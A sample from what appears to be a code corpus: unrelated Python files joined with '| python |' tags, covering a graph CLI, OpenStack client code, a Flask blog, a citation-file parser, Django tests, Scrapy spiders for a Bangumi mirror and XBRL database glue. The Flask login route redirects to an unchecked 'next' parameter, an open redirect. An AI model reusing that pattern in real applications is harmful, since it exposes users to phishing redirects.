abort(
"Invalid component version. Must be in the form organization/component@v1"
)
component_name = component_match.group(2) if component_match else None
ids = IdLookup(
organization_name=organization,
explicit_graph_name=graph or component_name or directory.name,
explicit_graph_version_id=graph_version_id,
)
if not directory:
if component:
directory = Path(component_name)
elif graph:
directory = Path(graph)
elif graph_version_id:
with abort_on_error("Error"):
directory = Path(ids.graph_name)
else:
abort("Specify --graph, --graph-version-id, or a directory")
with abort_on_error("Error cloning graph"):
if component:
content = download_component_zip(component)
else:
content = download_graph_zip(ids.graph_version_id)
editor = GraphDirectoryEditor(directory, overwrite=False)
with ZipFile(io.BytesIO(content), "r") as zf:
editor.add_node_from_zip("graph.yml", "graph.yml", zf)
sprint(f"[success]Cloned graph into {directory}")
_pull_graph_help = "The location of the graph to pull into [default: current directory]"
def pull(
organization: str = Option("", "-o", "--organization", help=_organization_help),
graph_version_id: str = Option("", help=_graph_version_id_help),
force: bool = Option(False, "-f", "--force", help=_force_help),
graph: Path = Argument(None, exists=True, help=_pull_graph_help),
):
"""Update the code for the current graph"""
ids = IdLookup(
organization_name=organization,
explicit_graph_version_id=graph_version_id,
explicit_graph_path=graph,
)
with abort_on_error("Error downloading graph"):
b = io.BytesIO(download_graph_zip(ids.graph_version_id))
editor = GraphDirectoryEditor(ids.graph_file_path, overwrite=force)
with abort_on_error("Error downloading graph"):
try:
with ZipFile(b, "r") as zf:
editor.add_node_from_zip("graph.yml", "graph.yml", zf)
except FileOverwriteError as e:
sprint(f"[error]{e}")
sprint("[info]Run this command with --force to overwrite local files")
raise typer.Exit(1)
sprint(f"[success]Pulled graph content")
| python |
# Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
External event triggering for servers, not to be used by users.
"""
from novaclient import base
class Event(base.Resource):
def __repr__(self):
return "<Event: %s>" % self.name
class ServerExternalEventManager(base.Manager):
resource_class = Event
def create(self, events):
"""Create one or more server events.
        :param events: A list of dictionaries containing 'server_uuid', 'name',
            'status', and 'tag' (which may be absent)
"""
body = {'events': events}
return self._create('/os-server-external-events', body, 'events',
return_raw=True)
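# A sketch of the expected payload, following the docstring above (the uuid,
# event name, and status values are placeholders):
#
#   manager = ServerExternalEventManager(api)
#   manager.create([{
#       'server_uuid': '00000000-0000-0000-0000-000000000000',
#       'name': 'network-changed',
#       'status': 'completed',
#       'tag': 'port-1',  # may be absent
#   }])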
| python |
import os
from flask import render_template, url_for, flash, redirect,request,abort
from blog import app,db,bcrypt
from blog.models import User,Post
from blog.forms import RegistrationForm, LoginForm,UpdateAccountForm,PostForm
from flask_login import login_user,current_user,logout_user,login_required
import secrets
@app.route("/")
@app.route("/home")
def home():
posts = Post.query.all()
return render_template('home.html', posts=posts)
@app.route("/about")
def about():
return render_template('about.html', title='About')
@app.route("/register", methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(username=form.username.data, email = form.email.data, password = hashed_password)
db.session.add(user)
db.session.commit()
        flash('Your account has been created! You can now log in', 'success')
return redirect(url_for('login'))
return render_template('register.html', title='Register', form=form)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and bcrypt.check_password_hash(user.password,form.password.data):
login_user(user,remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Login Unsuccessful. Please check username and password', 'danger')
return render_template('login.html', title='Login', form=form)
@app.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
def save_picture(form_picture):
random_hex = secrets.token_hex(8)
_,f_ext = os.path.splitext(form_picture.filename)
picture_fn = random_hex + f_ext
picture_path = os.path.join(app.root_path,'static/photos',picture_fn)
form_picture.save(picture_path)
return picture_fn
@app.route("/account",methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
if form.picture.data:
picture_file = save_picture(form.picture.data)
current_user.image_file= picture_file
current_user.username=form.username.data
current_user.email=form.email.data
db.session.commit()
flash('Account updated','success')
return redirect(url_for('account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
image_file = url_for('static',filename='photos/'+ current_user.image_file)
return render_template('account.html', title='Account', image_file=image_file,form=form)
@app.route("/post/new",methods=['GET', 'POST'])
@login_required
def new_post():
form = PostForm()
if form.validate_on_submit():
post = Post(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(post)
db.session.commit()
        flash('Post created!', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title='New Post', form=form ,legend= 'Update Post')
@app.route("/post/<post_id>")
def post(post_id):
post = Post.query.get_or_404(post_id)
    return render_template('post.html', title=post.title, post=post)
@app.route("/post/<int:post_id>/update",methods=['GET', 'POST'])
@login_required
def update_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
abort(403)
form = PostForm()
if form.validate_on_submit():
post.title = form.title.data
post.content = form.content.data
db.session.commit()
flash('Your post updated','success')
return redirect(url_for('post',post_id=post.id))
elif request.method == 'GET':
form.title.data = post.title
form.content.data = post.content
return render_template('create_post.html',title='Update Post',form=form,legend= 'Update Post')
@app.route("/post/<int:post_id>/delete",methods=['POST'])
@login_required
def delete_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
abort(403)
db.session.delete(post)
db.session.commit()
    flash('Your post has been deleted!', 'success')
return redirect(url_for('home')) | python |
import pandas as pd
import logging
def ris_detect(raw):
""" Detect RIS format style. """
if raw.startswith('TY -'):
logging.debug('RIS file format detected.')
return 'ris'
elif raw.startswith('%0'):
logging.debug('Endnote file format detected.')
return 'endnote'
else:
logging.debug('RIS format not identified.')
raise Exception(f'Data scheme not recognised. Please check file format.\nBeginning of file: "{raw[:20]}"')
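# For reference, minimal sketches of the two layouts detected above (the
# field values are made up):
#
#   RIS entry:        TY  - JOUR
#                     TI  - Some title
#                     ER  -
#
#   Endnote entry:    %0 Journal Article
#                     %T Some title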
def ris_parse(ris_file):
""" Read RIS file an parse rows and values to list of lists. """
with open(ris_file, 'r', encoding='utf-8-sig') as f:
raw = f.read()
data_scheme = ris_detect(raw)
data = raw.strip()
entry_sep = '\n\n' # Use 'ER - ' or '\n\n' as entry separator.
line_sep = '\n'
# Split data and remove empty rows (Endnote format)
documents = [item for item in data.split(entry_sep) if item]
table = [[item for item in doc.split(line_sep)] for doc in documents]
return table, data_scheme
def ris_df(ris_file):
""" Extract and return data as DataFrame. """
table, data_scheme = ris_parse(ris_file)
# Empty template DataFrame.
df = pd.DataFrame(columns=['title', 'abstract', 'source', 'year', 'publisher', 'type'], index = range(len(table)))
# Extract relevant data from RIS file table.
if data_scheme == 'ris':
for n, j in enumerate(table):
for i in j:
if i.startswith('TI'):
df.loc[n]['title'] = i[6:]
if i.startswith('AB'):
df.loc[n]['abstract'] = i[6:]
if i.startswith('T2'):
df.loc[n]['source'] = i[6:]
if i.startswith('PY'):
df.loc[n]['year'] = i[6:]
if i.startswith('M3'):
df.loc[n]['type'] = i[6:]
else:
for n, j in enumerate(table):
for i in j:
if i.startswith('%T'):
df.loc[n]['title'] = i[3:]
if i.startswith('%X'):
df.loc[n]['abstract'] = i[3:]
if i.startswith('%B'):
df.loc[n]['source'] = i[3:]
if i.startswith('%D'):
df.loc[n]['year'] = i[3:]
if i.startswith('%0'):
df.loc[n]['type'] = i[3:]
return df | python |
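if __name__ == '__main__':
    # Usage sketch; 'references.ris' is a placeholder filename.
    logging.basicConfig(level=logging.DEBUG)
    df = ris_df('references.ris')
    print(df[['title', 'year']].head())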
import unittest
import tethys_gizmos.views.gizmo_showcase as gizmo_showcase
from requests.exceptions import ConnectionError
from unittest import mock
from django.test import RequestFactory
from ... import UserFactory
class TestGizmoShowcase(unittest.TestCase):
def setUp(self):
self.user = UserFactory()
self.request_factory = RequestFactory()
def tearDown(self):
pass
@mock.patch('tethys_gizmos.views.gizmo_showcase.list_spatial_dataset_engines')
def test_get_geoserver_wms(self, mock_list_sdes):
endpoint = 'http://localhost:8080/geoserver/rest'
expected_endpoint = 'http://localhost:8080/geoserver/wms'
mock_sde = mock.MagicMock(type='GEOSERVER',
endpoint=endpoint)
mock_list_sdes.return_value = [mock_sde]
result = gizmo_showcase.get_geoserver_wms()
# Check Result
self.assertEqual(expected_endpoint, result)
@mock.patch('tethys_gizmos.views.gizmo_showcase.list_spatial_dataset_engines')
def test_get_geoserver_wms_connection_error(self, mock_list_sdes):
# Connection Error Case
endpoint = 'http://localhost:8080/geoserver/rest'
expected_endpoint = 'http://ciwmap.chpc.utah.edu:8080/geoserver/wms'
mock_sde = mock.MagicMock(type='GEOSERVER',
endpoint=endpoint)
mock_sde.validate.side_effect = ConnectionError
mock_list_sdes.return_value = [mock_sde]
result = gizmo_showcase.get_geoserver_wms()
# Check Result
self.assertEqual(expected_endpoint, result)
def test_index(self):
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
result = gizmo_showcase.index(request)
self.assertEqual(200, result.status_code)
def test_get_kml(self):
request = self.request_factory
result = gizmo_showcase.get_kml(request)
self.assertIn('kml_link', result._container[0].decode())
self.assertEqual(200, result.status_code)
def test_swap_kml(self):
request = self.request_factory
result = gizmo_showcase.swap_kml(request)
self.assertIn('.kml', result._container[0].decode())
self.assertEqual(200, result.status_code)
def test_swap_overlays(self):
request = self.request_factory
result = gizmo_showcase.swap_overlays(request)
self.assertIn('"type": "GeometryCollection"', result._container[0].decode())
self.assertEqual(200, result.status_code)
@mock.patch('tethys_gizmos.views.gizmo_showcase.messages')
def test_google_map_view(self, mock_messages):
mock_mi = mock_messages.info
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
        # Mock messages to avoid the "You cannot add messages without
        # installing django.contrib.messages.middleware.MessageMiddleware" error.
result = gizmo_showcase.google_map_view(request)
# Check result
mock_mi.assert_called_with(request, '[100, 40]')
self.assertEqual(200, result.status_code)
@mock.patch('tethys_gizmos.views.gizmo_showcase.messages')
def test_map_view(self, mock_messages):
mock_mi = mock_messages.info
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
        # Mock messages to avoid the "You cannot add messages without
        # installing django.contrib.messages.middleware.MessageMiddleware" error.
result = gizmo_showcase.map_view(request)
# Check result
mock_mi.assert_called_with(request, '[100, 40]')
self.assertEqual(200, result.status_code)
def test_esri_map(self):
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
result = gizmo_showcase.esri_map(request)
self.assertEqual(200, result.status_code)
def test_jobs_table_result(self):
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
result = gizmo_showcase.jobs_table_results(request=request, job_id='1')
self.assertEqual(302, result.status_code)
@mock.patch('tethys_gizmos.views.gizmo_showcase.BasicJob')
@mock.patch('tethys_gizmos.views.gizmo_showcase.CondorWorkflow')
def test_create_sample_jobs(self, mock_cw, mock_bj):
mock_bj().return_value = mock.MagicMock()
request = self.request_factory.get('/jobs')
request.user = self.user
gizmo_showcase.create_sample_jobs(request)
# Check BasicJob Call
mock_bj.assert_called_with(_status='VCP', description='Completed multi-process job with some errors',
label='gizmos_showcase', name='job_8', user=request.user)
mock_cw.assert_called_once()
mock_cw.assert_called_with(name='job_9', user=request.user, description='Workflow job with multiple nodes.',
label='gizmos_showcase', _status='VAR')
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_home(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'home')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('/developer/gizmos/map_layers/cesium-map-view', render_call_args[0][0][2]['map_layers_link'])
self.assertIn('home', render_call_args[0][0][2]['page_type'])
self.assertIn('/developer/gizmos/model/cesium-map-view', render_call_args[0][0][2]['model_link'])
self.assertIn('/developer/gizmos/home/cesium-map-view', render_call_args[0][0][2]['home_link'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_map_layers(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'map_layers')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('map_layers', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_terrain(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'terrain')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('terrain', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_czml(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'czml')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('czml', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_model(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'model')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('model', render_call_args[0][0][2]['page_type'])
self.assertIn('clock', render_call_args[0][0][2]['cesium_map_view'])
self.assertIn('globe', render_call_args[0][0][2]['cesium_map_view'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_models(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'model2')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('model2', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.messages')
def test_cesium_map_view_geometry(self, mock_messages):
request = self.request_factory.get('/jobs')
request.user = self.user
mock_post = mock.MagicMock()
request.POST = mock_post
mock_post.get.return_value = 'test_submitted_geometry'
# Execute
gizmo_showcase.cesium_map_view(request, 'home')
# Check geometry submit
mock_post.get.assert_called_with('geometry', None)
mock_messages.info.assert_called_with(request, 'test_submitted_geometry')
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
@mock.patch('tethys_gizmos.views.gizmo_showcase.JobsTable')
@mock.patch('tethys_gizmos.views.gizmo_showcase.TethysJob')
def test_jobs_table_demo(self, mock_TethysJob, mock_JobsTable, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
result = gizmo_showcase.jobs_table_demo(request)
mock_JobsTable.assert_called_with(
jobs=mock_TethysJob.objects.filter().order_by().select_subclasses(),
column_fields=('id', 'name', 'description', 'creation_time'),
hover=True,
striped=False,
bordered=False,
condensed=False,
results_url='gizmos:results',
refresh_interval=10000,
delete_btn=True,
show_detailed_status=True
)
mock_render.assert_called_with(request, 'tethys_gizmos/gizmo_showcase/jobs_table.html',
{'jobs_table': mock_JobsTable()})
self.assertEqual(mock_render(), result)
| python |
# This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.util.i18n import _
from indico.web.breadcrumbs import render_breadcrumbs
from indico.web.flask.util import url_for
from indico.web.menu import get_menu_item
from indico.web.views import WPDecorated, WPJinjaMixin
class WPAdmin(WPJinjaMixin, WPDecorated):
"""Base class for admin pages."""
def __init__(self, rh, active_menu_item=None, **kwargs):
kwargs['active_menu_item'] = active_menu_item or self.sidemenu_option
WPDecorated.__init__(self, rh, **kwargs)
def _get_breadcrumbs(self):
menu_item = get_menu_item('admin-sidemenu', self._kwargs['active_menu_item'])
items = [(_('Administration'), url_for('core.admin_dashboard'))]
if menu_item:
items.append(menu_item.title)
return render_breadcrumbs(*items)
def _get_body(self, params):
return self._get_page_content(params)
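# A hypothetical subclass, sketching how this base class is meant to be used
# (the template prefix and menu item name below are made up):
#
#   class WPExampleAdmin(WPAdmin):
#       template_prefix = 'example/'
#       sidemenu_option = 'example'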
| python |
import json
class ObjectLogService:
"""
    Service for journaling log records per object
"""
def __init__(self, app):
"""
:type app: metasdk.MetaApp
"""
self.__app = app
self.__options = {}
def log(self, record):
"""
        Writes a record for the object to the journal
"""
record['dispatcher'] = self.__app.dispatcher_name
if 'value' in record and record['value']:
if not isinstance(record['value'], dict):
raise ValueError("ObjectLogService expected dict in log record value field")
record['jsonValue'] = json.dumps(record['value'])
record.pop('value')
body_value = {
"record": record
}
return self.__app.native_api_call('object-log', 'log', body_value, self.__options, False, None, False, http_path="/api/meta/v1/", http_method='POST')
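# A usage sketch, assuming `app` is a configured metasdk.MetaApp instance
# (the record fields below are illustrative):
#
#   log_service = ObjectLogService(app)
#   log_service.log({
#       'objectId': 42,
#       'message': 'state changed',
#       'value': {'from': 'draft', 'to': 'published'},
#   })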
| python |
# -*- coding: utf-8 -*-
import scrapy
import re
from bgm.items import Record, Index, Friend, User, SubjectInfo, Subject
from bgm.util import *
from scrapy.http import Request
import datetime
import json
# Translation table mapping ASCII control characters (0-31) to None; used
# with str.translate() to strip them from scraped strings.
mpa = dict([(i, None) for i in range(32)])
class UserSpider(scrapy.Spider):
name = 'user'
def __init__(self, *args, **kwargs):
super(UserSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=400000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
if len(response.xpath(".//*[@id='headerProfile']"))==0:
return
user = response.xpath(".//*[@id='headerProfile']/div/div/h1/div[3]/small/text()").extract()[0][1:]
nickname = response.xpath(".//*[@class='headerContainer']//*[@class='inner']/a/text()").extract()[0].translate(mpa)
# Is blocked?
if len(response.xpath("//ul[@class='timeline']/li"))==0:
            return
if not 'redirect_urls' in response.meta:
uid = int(user)
else:
uid = int(response.meta['redirect_urls'][0].split('/')[-1])
date = response.xpath(".//*[@id='user_home']/div[@class='user_box clearit']/ul/li[1]/span[2]/text()").extract()[0].split(' ')[0]
date = parsedate(date)
yield User(name=user, nickname=nickname, uid=uid, joindate=date)
class IndexSpider(scrapy.Spider):
name='index'
def __init__(self, *args, **kwargs):
super(IndexSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=20000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/index/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
if len(response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/a"))==0:
return
indexid = response.url.split('/')[-1]
indexid=int(indexid)
creator = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/a/@href").extract()[0].split('/')[-1]
creator=str(creator).translate(mpa)
td = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span[1]/text()").extract()[0]
date = parsedate(td.split(' ')[0])
if len(response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span"))==2:
favourite = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span[2]/text()").extract()[0]
favourite = int(favourite)
else: favourite = 0
items = response.xpath(".//*[@id='columnSubjectBrowserA']/ul/li/@id").extract()
items = [int(itm.split('_')[-1]) for itm in items]
yield Index(indexid=indexid, creator=creator, favourite=favourite, date=date, items=items)
class RecordSpider(scrapy.Spider):
name='record'
def __init__(self, *args, **kwargs):
super(RecordSpider, self).__init__(*args, **kwargs)
if hasattr(self, 'userlist'):
userlist = []
with open(self.userlist, 'r') as fr:
while True:
l = fr.readline().strip()
                    if not l:
                        break
userlist.append(l)
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+i for i in userlist]
else:
if not hasattr(self, 'id_max'):
self.id_max=500000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
username = response.url.split('/')[-1]
if (not response.xpath(".//*[@id='headerProfile']")) or response.xpath(".//div[@class='tipIntro']"):
return
if username in blockusers:
return
uid = int(response.meta['redirect_urls'][0].split('/')[-1]) if 'redirect_urls' in response.meta else int(username)
nickname = next(iter(response.xpath(".//*[@class='headerContainer']//*[@class='inner']/a/text()").extract()), "").translate(mpa)
date = response.xpath(".//*[@id='user_home']/div[@class='user_box clearit']/ul/li[1]/span[2]/text()").extract()[0].split(' ')[0]
date = parsedate(date)
yield User(name=username, nickname=nickname, uid=uid, joindate=date)
if len(response.xpath(".//*[@id='anime']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/anime/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='game']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/game/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='book']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/book/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='music']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/music/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='real']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/real/list/"+username, callback = self.merge, meta = { 'uid': uid })
def merge(self, response):
followlinks = response.xpath("//ul[@class='navSubTabs']/li/a/@href").extract() # a list of links
for link in followlinks:
yield scrapy.Request(u"http://mirror.bgm.rin.cat"+link, callback = self.parse_recorder, meta = { 'uid': response.meta['uid'] })
def parse_recorder(self, response):
state = response.url.split('/')[-1].split('?')[0]
page = 1 if '=' not in response.url else int(response.url.split('=')[1])
tp = response.url.split('/')[-4]
items = response.xpath(".//*[@id='browserItemList']/li")
for item in items:
item_id = int(re.match(r"item_(\d+)",item.xpath("./@id").extract()[0]).group(1))
item_date = parsedate(item.xpath("./div/p[@class='collectInfo']/span[@class='tip_j']/text()").extract()[0])
if item.xpath("./div/p[@class='collectInfo']/span[@class='tip']"):
item_tags = item.xpath("./div/p[@class='collectInfo']/span[@class='tip']/text()").extract()[0].split(u' ')[2:-1]
else:
item_tags=None
try_match = next(iter(item.xpath("./div/p[@class='collectInfo']/span[@class='starstop-s']/span/@class").extract()), None)
if try_match is not None:
mtch = re.match(r'starlight stars(\d+)', try_match)
item_rate = mtch.group(1)
item_rate = int(item_rate)
else:
item_rate = None
comment = item.xpath(".//div[@class='text']/text()").extract()[0] if len(item.xpath(".//div[@class='text']")) > 0 else None
watchRecord = Record(
uid = response.meta['uid'],
typ = tp, state = state,
iid = item_id,
adddate = item_date
)
if item_tags:
watchRecord["tags"]=item_tags
if item_rate:
watchRecord["rate"]=item_rate
if comment:
watchRecord["comment"]=comment.translate(mpa)
yield watchRecord
total_count = int(re.search(r"(\d+)", response.xpath("//ul[@class='navSubTabs']/li/a[@class='focus']/span/text()").extract()[0]).group(1))
if 24 * page < total_count:
yield scrapy.Request(getnextpage(response.url),callback = self.parse_recorder, meta = { 'uid': response.meta['uid'] })
class FriendsSpider(scrapy.Spider):
name='friends'
handle_httpstatus_list = [302]
def __init__(self, *args, **kwargs):
super(FriendsSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=400000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i)+"/friends" for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
user = response.url.split('/')[-2]
lst = response.xpath(".//*[@id='memberUserList']/li//@href").extract()
for itm in lst:
yield Friend(user = user, friend = str(itm.split('/')[-1]))
class SubjectInfoSpider(scrapy.Spider):
name="subjectinfo"
def __init__(self, *args, **kwargs):
super(SubjectInfoSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=300000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
subject_id = int(response.url.split('/')[-1])
if not response.xpath(".//*[@id='headerSubject']"):
return
if response.xpath(".//div[@class='tipIntro']"):
return
typestring = response.xpath(".//div[@class='global_score']/div/small[1]/text()").extract()[0]
        typestring = typestring.split(' ')[1]
infobox = [itm.extract()[:-2] for itm in response.xpath(".//div[@class='infobox']//span/text()")]
infobox = set(infobox)
relations = [itm.extract() for itm in response.xpath(".//ul[@class='browserCoverMedium clearit']/li[@class='sep']/span/text()")]
relations = set(relations)
yield SubjectInfo(subjectid=subject_id,
subjecttype=typestring,
infobox=infobox,
relations=relations)
class SubjectSpider(scrapy.Spider):
name="subject"
def __init__(self, *args, **kwargs):
super(SubjectSpider, self).__init__(*args, **kwargs)
if hasattr(self, 'itemlist'):
itemlist = []
with open(self.itemlist, 'r') as fr:
while True:
l = fr.readline().strip()
                    if not l:
                        break
itemlist.append(l)
self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+i for i in itemlist]
else:
if not hasattr(self, 'id_max'):
self.id_max=300000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
subjectid = int(response.url.split('/')[-1]) # trueid
if not response.xpath(".//*[@id='headerSubject']"):
return
# This is used to filter those locked items
# However, considering that current Bangumi ranking list does not exclude blocked items,
# we include them in our spider.
#if response.xpath(".//div[@class='tipIntro']"):
# return;
if 'redirect_urls' in response.meta:
order = int(response.meta['redirect_urls'][0].split('/')[-1])
else:
            order = subjectid  # id
subjectname = response.xpath(".//*[@id='headerSubject']/h1/a/attribute::title").extract()[0]
if not subjectname:
subjectname = response.xpath(".//*[@id='headerSubject']/h1/a/text()").extract()[0]
subjecttype = response.xpath(".//div[@class='global_score']/div/small[1]/text()").extract()[0]
        subjecttype = subjecttype.split(' ')[1].lower()
infokey = [itm[:-2] for itm in response.xpath(".//div[@class='infobox']//li/span/text()").extract()]
infoval = response.xpath(".//div[@class='infobox']//li")
infobox = dict()
alias = []
for key,val in zip(infokey, infoval):
if val.xpath("a"):
infobox[key]=[ref.split('/')[-1] for ref in
val.xpath("a/@href").extract()]
if key == '别名':
alias.append(val.xpath('text()').extract()[0])
relateditms = response.xpath(".//ul[@class='browserCoverMedium clearit']/li")
relations = dict()
for itm in relateditms:
if itm.xpath("@class"):
relationtype = itm.xpath("span/text()").extract()[0]
relations[relationtype]=[itm.xpath("a[@class='title']/@href").
extract()[0].split('/')[-1]]
else:
relations[relationtype].append(itm.xpath("a[@class='title']/@href").
extract()[0].split('/')[-1])
brouche = response.xpath(".//ul[@class='browserCoverSmall clearit']/li")
if brouche:
relations['单行本']=[itm.split('/')[-1] for itm in
brouche.xpath("a/@href").extract()]
yield Subject(subjectid=subjectid,
subjecttype=subjecttype,
subjectname=subjectname,
order=order,
alias=alias,
staff=infobox,
relations=relations)
| python |
if __package__ is None:
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
from functools import partial
from Stream import Stream, StreamArray
from Stream import _no_value
from Operators import stream_func
from stream_test import *
def square(v):
return v*v
def square_stream_when_clock_ticks(
input_stream, trigger_stream):
return stream_func(inputs=input_stream,
f_type='element',
f=square,
num_outputs=1,
call_streams=[trigger_stream]
)
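# Passing trigger_stream via call_streams means the squaring function runs only
# when a value arrives on the clock stream, not when x or a are extended
# (as the check() expectations in test() below illustrate).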
def test():
x = Stream('x')
a = StreamArray('a')
clock_ticks = Stream('clock')
y = square_stream_when_clock_ticks(
input_stream=x, trigger_stream=clock_ticks)
z = square_stream_when_clock_ticks(
input_stream=a, trigger_stream=clock_ticks)
y.set_name('y')
z.set_name('z')
check(y, [9, 25, 4, 16])
check(z, [9.0, 25.0, 4.0, 16.0])
x.extend([3, 5])
a.extend([3, 5])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
print
x.extend([2, 4])
a.extend([2, 4])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
print
clock_ticks.extend(['tick'])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
print
clock_ticks.extend(['tick'])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
check_empty()
if __name__ == '__main__':
test()
| python |
'''
xbrlDB is an interface to XBRL databases.
Two implementations are provided:
(1) the XBRL Public Database schema for Postgres, published by XBRL US.
(2) a graph database, based on the XBRL Abstract Model PWD 2.
(c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved.
Mark V copyright applies to this software, which is licensed according to the terms of Arelle(r),
and does not apply to the XBRL US Database schema and description.
'''
import time, os, io, sys, logging
from arelle.Locale import format_string
from .XbrlPublicPostgresDB import insertIntoDB as insertIntoPostgresDB, isDBPort as isPostgresPort
from .XbrlSemanticGraphDB import insertIntoDB as insertIntoRexsterDB, isDBPort as isRexsterPort
from .XbrlSemanticRdfDB import insertIntoDB as insertIntoRdfDB, isDBPort as isRdfPort
dbTypes = {
"postgres": insertIntoPostgresDB,
"rexster": insertIntoRexsterDB,
"rdfDB": insertIntoRdfDB
}
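# Maps a database type name to the insert function of its backend implementation.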
